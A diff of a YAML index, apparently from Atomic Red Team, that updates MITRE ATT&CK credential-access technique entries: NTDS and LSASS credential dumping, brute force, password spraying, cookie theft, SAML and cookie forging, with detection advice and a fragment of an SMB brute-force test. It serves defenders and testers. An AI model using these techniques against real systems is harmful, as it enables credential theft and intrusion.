'2020-02-11T18:42:35.572Z' - modified: '2020-03-24T20:39:39.949Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - type: attack-pattern id: attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24 description: | Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory) - In addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) + In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. @@ -21158,6 +3226,12 @@ credential-access: to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest. Retrieved February 3, 2015. source_name: Metcalf 2015 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-12-14T23:08:02.782Z' + created: '2020-02-11T18:42:35.572Z' x_mitre_platforms: - Windows x_mitre_is_subtechnique: true @@ -21165,10 +3239,8 @@ credential-access: x_mitre_permissions_required: - Administrator x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - PowerShell logs - - Process monitoring + - 'File: File Access' + - 'Command: Command Execution' x_mitre_system_requirements: - Access to Domain Controller or backup x_mitre_detection: Monitor processes and command-line arguments for program @@ -21414,9 +3486,11 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T02:41:11.550Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:00.356Z' created: '2020-10-19T17:58:04.155Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -21425,20 +3499,12 @@ credential-access: Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] T1040: technique: - created: '2017-05-31T21:30:41.399Z' - modified: '2020-03-25T21:03:49.610Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: @@ -21457,21 +3523,27 @@ credential-access: name: Network Sniffing created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529 - x_mitre_version: '1.1' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-02T17:51:59.236Z' + created: '2017-05-31T21:30:41.399Z' + x_mitre_version: '1.2' x_mitre_data_sources: - - Network device logs - - Host network interface - - Netflow/Enclave netflow - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would - likely need to perform a man-in-the-middle attack against other devices on - a wired network in order to capture traffic that was not to or from the current - compromised system. This change in the flow of information is detectable at - the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. - Detecting compromised network devices is a bit more challenging. Auditing - administrator logins, configuration changes, and device images is required - to detect malicious changes. + likely need to perform a [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) + attack against other devices on a wired network in order to capture traffic + that was not to or from the current compromised system. This change in the + flow of information is detectable at the enclave network level. Monitor for + ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network + devices is a bit more challenging. Auditing administrator logins, configuration + changes, and device images is required to detect malicious changes. x_mitre_permissions_required: - Administrator - SYSTEM @@ -21479,6 +3551,7 @@ credential-access: - Linux - macOS - Windows + - Network x_mitre_system_requirements: - Network interface access and packet capture driver x_mitre_is_subtechnique: false @@ -21669,7 +3742,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-06-09T20:46:00.758Z' + modified: '2021-02-09T14:15:25.186Z' created: '2017-05-31T21:30:19.735Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -21699,7 +3772,7 @@ credential-access: processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). - [PowerShell](https://attack.mitre.org/techniques/T1086) scripts also exist + [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information @@ -21720,10 +3793,15 @@ credential-access: processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs." x_mitre_data_sources: - - API monitoring - - Process monitoring - - PowerShell logs - - Process command-line parameters + - 'Process: Process Creation' + - 'Process: Process Access' + - 'Command: Command Execution' + - 'File: File Access' + - 'Windows Registry: Windows Registry Key Access' + - 'Active Directory: Active Directory Object Access' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Process: OS API Execution' x_mitre_contributors: - Vincent Le Toux - Ed Williams, Trustwave, SpiderLabs @@ -21846,8 +3924,8 @@ credential-access: modified: '2020-09-16T15:39:59.041Z' created: '2020-02-11T18:38:56.197Z' x_mitre_data_sources: - - Authentication logs - - Office 365 account logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_permissions_required: - User x_mitre_detection: It is difficult to detect when hashes are cracked, since @@ -21947,11 +4025,14 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-25T20:59:05.209Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:55.147Z' created: '2020-02-11T19:05:45.829Z' x_mitre_data_sources: - - File monitoring - - DLL monitoring + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_contributors: - Vincent Le Toux x_mitre_permissions_required: @@ -21961,7 +4042,7 @@ credential-access: Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows @@ -22015,7 +4096,7 @@ credential-access: - source_name: Cylance Cleaver description: Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. - url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf + url: https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf - source_name: US-CERT TA18-068A 2018 url: https://www.us-cert.gov/ncas/alerts/TA18-086A description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted @@ -22052,31 +4133,31 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-19T22:43:45.126Z' + modified: '2021-04-21T16:41:35.269Z' created: '2020-02-11T18:38:22.617Z' x_mitre_contributors: - Microsoft Threat Intelligence Center (MSTIC) x_mitre_data_sources: - - Authentication logs - - Office 365 account logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_permissions_required: - User x_mitre_detection: Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - Office 365 - - GCP - - Azure AD - - AWS - - Azure - - SaaS + - Google Workspace + - Containers identifier: T1110.001 atomic_tests: - name: Brute Force Credentials of all domain users via SMB @@ -22166,6 +4247,70 @@ credential-access: } } Write-Host "End of bruteforce" + T1555.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1555.005 + url: https://attack.mitre.org/techniques/T1555/005 + - source_name: ise Password Manager February 2019 + url: https://www.ise.io/casestudies/password-manager-hacking/ + description: 'ise. (2019, February 19). Password Managers: Under the Hood + of Secrets Management. Retrieved January 22, 2021.' + - source_name: FoxIT Wocao December 2019 + url: https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf + description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation + Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved + October 8, 2020.' + - source_name: Github KeeThief + url: https://github.com/GhostPack/KeeThief + description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8, + 2021. + - source_name: NVD CVE-2019-3610 + url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610 + description: National Vulnerability Database. (2019, October 9). CVE-2019-3610 + Detail. Retrieved April 14, 2021. + - source_name: Cyberreason Anchor December 2019 + url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware + description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM + A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September + 10, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Password Managers + description: |- + Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019) + + Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610) + Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019) + id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-14T19:15:22.416Z' + created: '2021-01-22T16:08:40.629Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: "Consider monitoring API calls, file read events, and processes + for suspicious activity that could indicate searching in process memory of + password managers. \n\nConsider monitoring file reads surrounding known password + manager applications." + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'File: File Access' + - 'Process: Process Access' + - 'Command: Command Execution' + x_mitre_contributors: + - Matt Burrough, @mattburrough, Microsoft + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] T1110.003: technique: id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c @@ -22217,20 +4362,20 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-19T22:43:45.579Z' + modified: '2021-04-06T12:32:47.678Z' created: '2020-02-11T18:39:25.122Z' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_detection: |- Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. @@ -22242,8 +4387,8 @@ credential-access: x_mitre_permissions_required: - User x_mitre_data_sources: - - Authentication logs - - Office 365 account logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_contributors: - Microsoft Threat Intelligence Center (MSTIC) - John Strand @@ -22398,9 +4543,11 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-13T21:23:01.370Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:12:34.422Z' created: '2020-06-26T04:01:09.648Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - root @@ -22409,8 +4556,8 @@ credential-access: Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). x_mitre_data_sources: - - Authentication logs - - File monitoring + - 'File: File Modification' + - 'Logon Session: Logon Session Creation' x_mitre_contributors: - Scott Knight, @sdotknight, VMware Carbon Black - George Allen, VMware Carbon Black @@ -22469,7 +4616,8 @@ credential-access: x_mitre_contributors: - Itzik Kotler, SafeBreach x_mitre_data_sources: - - File monitoring + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication @@ -22598,7 +4746,8 @@ credential-access: modified: '2020-03-19T15:32:18.098Z' created: '2020-02-11T18:46:24.434Z' x_mitre_data_sources: - - Process monitoring + - 'Command: Command Execution' + - 'File: File Access' x_mitre_permissions_required: - root x_mitre_detection: To obtain the passwords and hashes stored in memory, processes @@ -22613,6 +4762,73 @@ credential-access: x_mitre_platforms: - Linux atomic_tests: [] + T1606.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1606.002 + url: https://attack.mitre.org/techniques/T1606/002 + - source_name: Microsoft SolarWinds Steps + url: https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/ + description: Lambert, J. (2020, December 13). Important steps for customers + to protect themselves from recent nation-state cyberattacks. Retrieved December + 17, 2020. + - source_name: Microsoft SAML Token Lifetimes + url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes + description: Microsoft. (2020, December 14). Configurable token lifetimes + in Microsoft Identity Platform. Retrieved December 22, 2020. + - source_name: Cyberark Golden SAML + url: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps + description: 'Reiner, S. (2017, November 21). Golden SAML: Newly Discovered + Attack Technique Forges Authentication to Cloud Apps. Retrieved December + 17, 2020.' + - source_name: Microsoft SolarWinds Customer Guidance + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 17, 2020. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. (2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: SAML Tokens + description: |- + An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML) + + An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users. + + An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance) + id: attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-14T14:29:27.290Z' + created: '2020-12-17T15:24:12.240Z' + x_mitre_permissions_required: + - Administrator + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Creation' + - 'Web Credential: Web Credential Usage' + x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender + - Oleg Kolesnikov, Securonix + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML) + + Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML) + x_mitre_platforms: + - Azure AD + - SaaS + - Windows + - Office 365 + - Google Workspace + atomic_tests: [] T1003.002: technique: external_references: @@ -22650,9 +4866,9 @@ credential-access: x_mitre_contributors: - Ed Williams, Trustwave, SpiderLabs x_mitre_data_sources: - - Process command-line parameters - - PowerShell logs - - Process monitoring + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Access' + - 'File: File Access' x_mitre_permissions_required: - SYSTEM x_mitre_detection: Hash dumpers open the Security Accounts Manager (SAM) on @@ -22807,7 +5023,8 @@ credential-access: modified: '2020-02-17T13:16:53.850Z' created: '2020-02-12T18:56:31.051Z' x_mitre_data_sources: - - Process monitoring + - 'Command: Command Execution' + - 'Process: Process Access' x_mitre_permissions_required: - root x_mitre_detection: Monitor processes and command-line arguments for activity @@ -22856,8 +5073,7 @@ credential-access: modified: '2020-03-25T21:46:46.831Z' created: '2020-02-11T19:14:48.309Z' x_mitre_data_sources: - - Authentication logs - - Windows event logs + - 'Logon Session: Logon Session Metadata' x_mitre_permissions_required: - User x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed @@ -22897,10 +5113,10 @@ credential-access: with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) - Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1192) + Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term - access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1527).(Citation: + access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nAdversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth @@ -22946,7 +5162,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-07-14T19:16:30.906Z' + modified: '2021-04-14T17:56:17.311Z' created: '2019-09-04T15:54:25.684Z' x_mitre_is_subtechnique: false x_mitre_detection: |- @@ -22959,17 +5175,17 @@ credential-access: - SaaS - Office 365 - Azure AD + - Google Workspace x_mitre_permissions_required: - User - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_contributors: - Shailesh Tiwary (Indian Army) - Mark Wee - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services) - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC) x_mitre_data_sources: - - Azure activity logs - - OAuth audit logs + - 'User Account: User Account Modification' atomic_tests: [] T1539: technique: @@ -22987,7 +5203,7 @@ credential-access: APT framework. Retrieved October 14, 2019. - source_name: Unit 42 Mac Crypto Cookies January 2019 url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ - description: Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. - description: Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019. url: https://github.com/kgretzky/evilginx2 @@ -23001,28 +5217,28 @@ credential-access: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Steal Web Session Cookie description: |- - An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. + An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) - After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application. + After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application. id: attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-04-21T15:26:25.584Z' + modified: '2021-04-14T17:57:07.903Z' created: '2019-10-08T20:04:35.508Z' x_mitre_is_subtechnique: false x_mitre_detection: Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory. x_mitre_data_sources: - - File monitoring - - API monitoring - x_mitre_version: '1.0' + - 'File: File Access' + - 'Process: Process Access' + x_mitre_version: '1.1' x_mitre_permissions_required: - User x_mitre_contributors: @@ -23034,6 +5250,7 @@ credential-access: - Windows - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1558: technique: @@ -23097,13 +5314,13 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-09-29T16:16:06.868Z' + modified: '2020-11-05T16:07:04.189Z' created: '2020-02-11T19:12:46.830Z' x_mitre_system_requirements: - Kerberos authentication enabled x_mitre_data_sources: - - Windows event logs - - Authentication logs + - 'Active Directory: Active Directory Credential Request' + - 'Logon Session: Logon Session Metadata' x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting @@ -23123,7 +5340,7 @@ credential-access: access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored." - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -23184,9 +5401,9 @@ credential-access: x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_data_sources: - - API monitoring - - Process monitoring - - Kernel drivers + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' x_mitre_detection: |- Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior. @@ -23228,24 +5445,24 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-15T19:39:36.109Z' + modified: '2021-04-12T18:32:33.620Z' created: '2020-02-04T12:47:23.631Z' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers x_mitre_permissions_required: - User - Administrator - SYSTEM x_mitre_is_subtechnique: false - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_detection: |- While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information. @@ -23255,14 +5472,63 @@ credential-access: Additionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives. x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Windows event logs - - File monitoring - - Windows Registry - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'File: File Access' + - 'Process: Process Creation' + - 'User Account: User Account Authentication' + - 'Windows Registry: Windows Registry Key Access' + atomic_tests: [] + T1606.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1606.001 + url: https://attack.mitre.org/techniques/T1606/001 + - description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass + the Cookie. Retrieved April 5, 2019. + url: https://wunderwuzzi23.github.io/blog/passthecookie.html + source_name: Pass The Cookie + - source_name: Volexity SolarWinds + url: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ + description: Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds + Compromise to Breach Organizations. Retrieved December 29, 2020. + - source_name: Unit 42 Mac Crypto Cookies January 2019 + url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware + Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Cookies + description: |- + Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access. + + Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values. + + Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019) + id: attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-01-11T20:31:36.404Z' + created: '2020-12-17T02:14:34.178Z' + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Creation' + - 'Web Credential: Web Credential Usage' + x_mitre_detection: Monitor for anomalous authentication activity, such as logons + or other user session activity associated with unknown accounts. Monitor for + unexpected and abnormal access to resources, including access of websites + and cloud-based applications by the same user in different locations or by + different systems that do not match expected configurations. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Linux + - macOS + - Windows + - SaaS atomic_tests: [] T1056.003: technique: @@ -23297,7 +5563,7 @@ credential-access: x_mitre_system_requirements: - An externally facing login portal is configured. x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_detection: File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content. @@ -23308,6 +5574,78 @@ credential-access: - macOS - Windows atomic_tests: [] + T1555.004: + technique: + id: attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447 + description: |- + Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker) + + The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are 